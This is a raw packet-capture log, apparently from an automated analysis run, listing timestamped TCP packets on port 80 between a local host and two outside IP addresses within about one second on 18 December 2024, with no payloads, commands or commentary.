Dec 18, 2024 13:38:48.453363895 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:48.453366041 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.453461885 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.453500032 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.453521967 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:48.453603029 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:48.453629017 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.453743935 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:48.493449926 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.493616104 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:48.541182041 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.542212963 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:48.572592974 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.572670937 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.572849035 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:48.572875023 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.572890997 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.572920084 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.572932959 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.572987080 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.573139906 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.573196888 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.573332071 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.573344946 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.573719025 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.573736906 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.573858023 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.574179888 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.574194908 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.574331045 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.574373007 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.574385881 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.574398041 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.574412107 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.574424982 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.574440002 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.574456930 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.574506998 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.574747086 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:48.574918985 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.574943066 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.575012922 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:48.575031996 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.575211048 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.575225115 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.575237989 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.575254917 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.575274944 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:48.575361967 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.575512886 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.575526953 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.575539112 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.575551987 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.575565100 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.575601101 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:48.575615883 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.575668097 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:48.575885057 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.576168060 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.576183081 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576323986 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.576469898 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576482058 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576495886 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576508999 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576520920 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576536894 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576550007 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576561928 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576575041 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576607943 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576621056 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576632977 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576646090 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576674938 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576687098 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576715946 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576730013 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576770067 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576783895 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576795101 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576808929 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.576900959 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.577184916 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.577198029 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.577234030 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.577503920 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.577517986 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.577531099 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.577543974 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.577557087 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.577569008 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.577584028 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.577598095 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.577610016 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.577769041 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.577786922 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.578231096 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.578286886 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.578403950 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.579515934 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.579590082 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.579721928 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.580615044 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.580631971 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.580743074 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.581669092 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.581825972 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.581856966 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.582663059 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.582724094 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.582990885 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.584057093 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.584130049 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.584144115 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.584173918 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.585048914 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.585503101 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.585556984 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.586364031 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.586514950 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.586575031 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.587533951 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.587595940 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.587646961 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.587842941 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.588721991 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.588797092 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.588816881 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.588952065 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.589967966 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.590198040 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.590251923 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.590981007 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.591221094 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.591346025 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.592173100 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.592263937 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.592286110 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.593739033 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.593755960 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.593810081 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.593923092 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.596942902 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.596973896 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.597001076 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.597016096 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.597033024 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.597052097 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.597052097 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.597086906 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.597415924 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.597604990 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.598546028 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.598675966 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.598876953 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.599929094 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.600141048 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.600203991 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.600764990 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.600841045 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.601057053 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.601697922 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.601715088 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.601773024 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.601773024 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.602612019 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.603002071 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.603017092 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.603720903 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.604331970 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.604357004 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.604949951 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.605026960 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.605060101 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.605109930 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.606187105 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.606520891 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.606579065 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.607363939 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.607494116 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.607563972 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.608426094 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.608649015 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.608653069 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.609759092 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.609807014 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.609837055 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.610167980 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.610896111 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.611108065 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.611219883 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.611984968 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.612142086 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.612201929 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.613073111 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.613147020 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.613266945 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.614276886 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.614368916 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.614445925 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.615427971 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.615575075 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.615598917 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.615652084 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.616877079 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.617019892 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.617449999 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.618221045 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.618247986 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.618357897 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.618593931 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.618607998 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.618722916 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.619297981 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.619359016 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.619365931 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.619422913 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.620136976 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.620245934 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.620277882 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.620381117 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.621330023 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.621551991 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.621690035 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.622454882 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.622693062 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.622752905 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.623603106 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.623703957 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.623924017 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.624752998 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.624933958 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.624973059 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.625828028 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.625943899 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.626151085 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.626216888 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.627281904 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.627377033 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.627433062 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.628345966 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.628535032 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.628590107 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.629573107 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.629652023 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.629690886 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.630487919 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.630703926 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.631084919 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.631164074 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.632045984 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.632064104 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.632163048 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.633335114 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.633455038 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.633524895 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.633807898 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.634704113 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.634856939 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.635004997 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.664793015 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.696073055 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.696099043 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.696149111 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.698182106 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.698221922 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.698267937 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.698282957 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.698297977 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.698443890 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.698872089 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:48.698968887 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:48.700489044 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.700504065 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.700670004 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.700685978 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.702316046 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.702330112 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.702522039 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.702536106 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.702621937 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.704364061 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.704380035 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.704444885 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.704493999 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.706093073 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.706104994 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.706228018 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.706242085 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.706370115 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.707951069 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.707964897 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.708215952 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.708230019 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.709856033 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.709867954 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.710428953 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.710479021 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.711625099 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.711638927 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.711680889 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.712136984 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.712181091 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.712822914 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.712841034 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.713161945 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.713177919 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.713399887 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.713413954 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.713525057 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.713620901 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.713634968 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.713881016 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.713908911 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.714149952 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.714193106 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.714348078 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.714376926 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.714529991 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.714653969 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.715019941 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.715063095 CET	80	49725	185.185.71.170	192.168.2.8
Dec 18, 2024 13:38:48.715442896 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:48.715522051 CET	49725	80	192.168.2.8	185.185.71.170
Dec 18, 2024 13:38:48.765522003 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.765686989 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.765805960 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.766099930 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.766182899 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.766360998 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.766557932 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.766618013 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.767540932 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.767654896 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.767750978 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.768461943 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.768644094 CET	80	49723	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:48.768709898 CET	49723	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:48.769504070 CET	80	49723	31.41.244.11	192.168.2.8
